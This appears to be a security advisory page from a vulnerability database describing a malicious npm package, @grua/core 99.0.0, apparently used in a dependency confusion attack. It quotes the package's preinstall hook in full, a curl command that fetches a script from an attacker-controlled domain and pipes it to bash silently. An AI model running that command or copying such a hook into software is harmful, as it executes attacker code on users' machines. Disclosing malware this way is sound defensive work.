VDB

GCVE-110-OSM-2026-1131

GCVE-110-OSM-2026-1131
Advisory PublishedCVSS 5.4/10
Vulnetix · Advisory published March 28, 2026
Executes a remote bash script fetched from attacker-controlled domain keywise.com.br via a preinstall hook that pipes curl output directly to bash, running silently in the background with stderr suppressed. The package contains no functional code — the entire payload is delivered remotely at install time. package.json preinstall script: `curl -sS https://keywise.com.br/cp-dep/s | bash 2>/dev/null &`. Fetches and executes an arbitrary shell script from keywise.com.br/cp-dep/s. Backgrounded with & to avoid blocking npm install, stderr redirected to /dev/null to suppress errors. The package body (index.js) is a 2-line stub (`module.exports = {}`). Version 99.0.0 is characteristic of dependency confusion attacks.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
5.4/10
Medium · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Affected Products

VendorProductVersionsPlatforms
unknown@grua/core99.0.0 (affected)

References

vendor

Browse GCVE Records

73,443 records in the GCVE database · Updated July 18, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›